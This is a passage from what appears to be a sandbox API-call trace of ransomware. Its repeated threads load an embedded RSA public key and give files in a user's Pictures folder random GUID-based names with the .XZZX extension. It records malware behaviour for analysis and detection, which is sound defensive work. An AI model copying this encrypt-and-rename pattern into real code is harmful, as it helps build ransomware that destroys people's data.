param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\E9BC45FA239A3D927E5970F7266521DA.XZZX") returned 116 [0189.937] StrStrW (lpFirst="FA78694804C1E3566FC4CB7C08F6C79E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 710 os_tid = 0xda4 [0190.100] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0190.100] lstrcpyW (in: lpString1=0x2caf460, lpString2="1698FA38038EB2CD51213BC807C39715.XZZX" | out: lpString1="1698FA38038EB2CD51213BC807C39715.XZZX") returned="1698FA38038EB2CD51213BC807C39715.XZZX" [0190.100] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.100] SetErrorMode (uMode=0x1) returned 0x1 [0190.100] lstrcpyW (in: lpString1=0x2caf860, lpString2="1698FA38038EB2CD51213BC807C39715.XZZX" | out: lpString1="1698FA38038EB2CD51213BC807C39715.XZZX") returned="1698FA38038EB2CD51213BC807C39715.XZZX" [0190.100] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xd3b996da, Data2=0xe4b1, Data3=0x4d63, Data4=([0]=0xb0, [1]=0x19, [2]=0xaa, [3]=0xf5, [4]=0x42, [5]=0x58, [6]=0xd4, [7]=0x27))) returned 0x0 [0190.100] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1698FA38038EB2CD51213BC807C39715.XZZX") returned 80 [0190.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0190.100] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ADAB74BA4521AD73D3B996DA47EC91BB.XZZX") returned 80 [0190.100] StrStrW (lpFirst="1698FA38038EB2CD51213BC807C39715.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 711 os_tid = 0xda8 [0190.248] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0190.249] lstrcpyW (in: lpString1=0x2caf460, lpString2="1971D3BF09924C93CB17194F0DC730DB.XZZX" | out: lpString1="1971D3BF09924C93CB17194F0DC730DB.XZZX") returned="1971D3BF09924C93CB17194F0DC730DB.XZZX" [0190.249] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.249] SetErrorMode (uMode=0x1) returned 0x1 [0190.249] lstrcpyW (in: lpString1=0x2caf860, lpString2="1971D3BF09924C93CB17194F0DC730DB.XZZX" | out: lpString1="1971D3BF09924C93CB17194F0DC730DB.XZZX") returned="1971D3BF09924C93CB17194F0DC730DB.XZZX" [0190.249] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x140e18f7, Data2=0x6e73, Data3=0x4b56, Data4=([0]=0xbf, [1]=0xf1, [2]=0x3b, [3]=0xc3, [4]=0x91, [5]=0x2c, [6]=0x63, [7]=0x59))) returned 0x0 [0190.249] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1971D3BF09924C93CB17194F0DC730DB.XZZX") returned 80 [0190.249] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0190.249] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\110F58F52080CBA2140E18F7234BAFEA.XZZX") returned 80 [0190.249] StrStrW (lpFirst="1971D3BF09924C93CB17194F0DC730DB.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 712 os_tid = 0xdb0 [0190.512] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0190.512] lstrcpyW (in: lpString1=0x2caf460, lpString2="2187C5602F1ADAF08D4383D0333BBF38.XZZX" | out: lpString1="2187C5602F1ADAF08D4383D0333BBF38.XZZX") returned="2187C5602F1ADAF08D4383D0333BBF38.XZZX" [0190.513] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.513] SetErrorMode (uMode=0x1) returned 0x1 [0190.513] lstrcpyW (in: lpString1=0x2caf860, lpString2="2187C5602F1ADAF08D4383D0333BBF38.XZZX" | out: lpString1="2187C5602F1ADAF08D4383D0333BBF38.XZZX") returned="2187C5602F1ADAF08D4383D0333BBF38.XZZX" [0190.513] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x7acf7534, Data2=0xebf1, Data3=0x4a6a, Data4=([0]=0xab, [1]=0x28, [2]=0xc3, [3]=0x88, [4]=0x22, [5]=0xb9, [6]=0x9f, [7]=0xaa))) returned 0x0 [0190.513] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2187C5602F1ADAF08D4383D0333BBF38.XZZX") returned 80 [0190.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0190.513] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0DE411F444955BCA7ACF753447604012.XZZX") returned 80 [0190.513] StrStrW (lpFirst="2187C5602F1ADAF08D4383D0333BBF38.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 713 os_tid = 0xdb4 [0190.655] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0190.655] lstrcpyW (in: lpString1=0x2caf460, lpString2="3A2295CD2F8CD2DF95E7618733C2B727.XZZX" | out: lpString1="3A2295CD2F8CD2DF95E7618733C2B727.XZZX") returned="3A2295CD2F8CD2DF95E7618733C2B727.XZZX" [0190.655] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.655] SetErrorMode (uMode=0x1) returned 0x1 [0190.655] lstrcpyW (in: lpString1=0x2caf860, lpString2="3A2295CD2F8CD2DF95E7618733C2B727.XZZX" | out: lpString1="3A2295CD2F8CD2DF95E7618733C2B727.XZZX") returned="3A2295CD2F8CD2DF95E7618733C2B727.XZZX" [0190.655] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x2088a32d, Data2=0x1354, Data3=0x43e4, Data4=([0]=0xa2, [1]=0x8a, [2]=0x52, [3]=0x57, [4]=0xa6, [5]=0x77, [6]=0x14, [7]=0x51))) returned 0x0 [0190.655] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3A2295CD2F8CD2DF95E7618733C2B727.XZZX") returned 80 [0190.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0190.655] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\D0F1E1C4052032D02088A32D07EB1718.XZZX") returned 80 [0190.655] StrStrW (lpFirst="3A2295CD2F8CD2DF95E7618733C2B727.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 714 os_tid = 0xdb8 [0190.810] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0190.810] lstrcpyW (in: lpString1=0x2caf460, lpString2="4EC1B3383CF01EB849835EF241110300.XZZX" | out: lpString1="4EC1B3383CF01EB849835EF241110300.XZZX") returned="4EC1B3383CF01EB849835EF241110300.XZZX" [0190.810] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.810] SetErrorMode (uMode=0x1) returned 0x1 [0190.811] lstrcpyW (in: lpString1=0x2caf860, lpString2="4EC1B3383CF01EB849835EF241110300.XZZX" | out: lpString1="4EC1B3383CF01EB849835EF241110300.XZZX") returned="4EC1B3383CF01EB849835EF241110300.XZZX" [0190.811] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xa3d6234e, Data2=0x8fe9, Data3=0x42af, Data4=([0]=0x88, [1]=0xd7, [2]=0xa6, [3]=0x17, [4]=0x8d, [5]=0x24, [6]=0xc6, [7]=0x2c))) returned 0x0 [0190.811] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4EC1B3383CF01EB849835EF241110300.XZZX") returned 80 [0190.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0190.811] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BB9EB3FE257C7247A3D6234E2847568F.XZZX") returned 80 [0190.811] StrStrW (lpFirst="4EC1B3383CF01EB849835EF241110300.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 715 os_tid = 0xdbc [0190.966] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0190.966] lstrcpyW (in: lpString1=0x2caf460, lpString2="567FB4290F0A7CE338C9770B132B612B.XZZX" | out: lpString1="567FB4290F0A7CE338C9770B132B612B.XZZX") returned="567FB4290F0A7CE338C9770B132B612B.XZZX" [0190.966] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0190.966] SetErrorMode (uMode=0x1) returned 0x1 [0190.966] lstrcpyW (in: lpString1=0x2caf860, lpString2="567FB4290F0A7CE338C9770B132B612B.XZZX" | out: lpString1="567FB4290F0A7CE338C9770B132B612B.XZZX") returned="567FB4290F0A7CE338C9770B132B612B.XZZX" [0190.966] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x58c1017e, Data2=0x5f75, Data3=0x4c29, Data4=([0]=0xb4, [1]=0x30, [2]=0xba, [3]=0xca, [4]=0x8, [5]=0xec, [6]=0x2, [7]=0xd1))) returned 0x0 [0190.966] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\567FB4290F0A7CE338C9770B132B612B.XZZX") returned 80 [0190.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0190.967] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2FC370961C6605BD58C1017E1F30EA05.XZZX") returned 80 [0190.967] StrStrW (lpFirst="567FB4290F0A7CE338C9770B132B612B.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 716 os_tid = 0xdc0 [0191.123] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0191.123] lstrcpyW (in: lpString1=0x2caf460, lpString2="5C36794D2643414F2FE671172A8D2597.XZZX" | out: lpString1="5C36794D2643414F2FE671172A8D2597.XZZX") returned="5C36794D2643414F2FE671172A8D2597.XZZX" [0191.123] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0191.123] SetErrorMode (uMode=0x1) returned 0x1 [0191.123] lstrcpyW (in: lpString1=0x2caf860, lpString2="5C36794D2643414F2FE671172A8D2597.XZZX" | out: lpString1="5C36794D2643414F2FE671172A8D2597.XZZX") returned="5C36794D2643414F2FE671172A8D2597.XZZX" [0191.123] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xe3ceb884, Data2=0x6131, Data3=0x4674, Data4=([0]=0x8f, [1]=0x14, [2]=0x9e, [3]=0x27, [4]=0x82, [5]=0x5a, [6]=0xff, [7]=0x4f))) returned 0x0 [0191.123] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5C36794D2643414F2FE671172A8D2597.XZZX") returned 80 [0191.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0191.123] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EE7B55441ABF7034E3CEB8841D8A547C.XZZX") returned 80 [0191.123] StrStrW (lpFirst="5C36794D2643414F2FE671172A8D2597.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 717 os_tid = 0xdc4 [0191.278] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0191.278] lstrcpyW (in: lpString1=0x2caf460, lpString2="609D61282FED0EE4AFD8291A340DF32C.XZZX" | out: lpString1="609D61282FED0EE4AFD8291A340DF32C.XZZX") returned="609D61282FED0EE4AFD8291A340DF32C.XZZX" [0191.279] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0191.279] SetErrorMode (uMode=0x1) returned 0x1 [0191.279] lstrcpyW (in: lpString1=0x2caf860, lpString2="609D61282FED0EE4AFD8291A340DF32C.XZZX" | out: lpString1="609D61282FED0EE4AFD8291A340DF32C.XZZX") returned="609D61282FED0EE4AFD8291A340DF32C.XZZX" [0191.279] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xa2006091, Data2=0x577f, Data3=0x4be1, Data4=([0]=0xb1, [1]=0x8c, [2]=0x9, [3]=0x4a, [4]=0xdb, [5]=0xc7, [6]=0x48, [7]=0xee))) returned 0x0 [0191.279] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\609D61282FED0EE4AFD8291A340DF32C.XZZX") returned 80 [0191.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0191.279] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7F012EEF19EF1B9FA20060911CB9FFE7.XZZX") returned 80 [0191.279] StrStrW (lpFirst="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 718 os_tid = 0xdc8 [0191.434] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 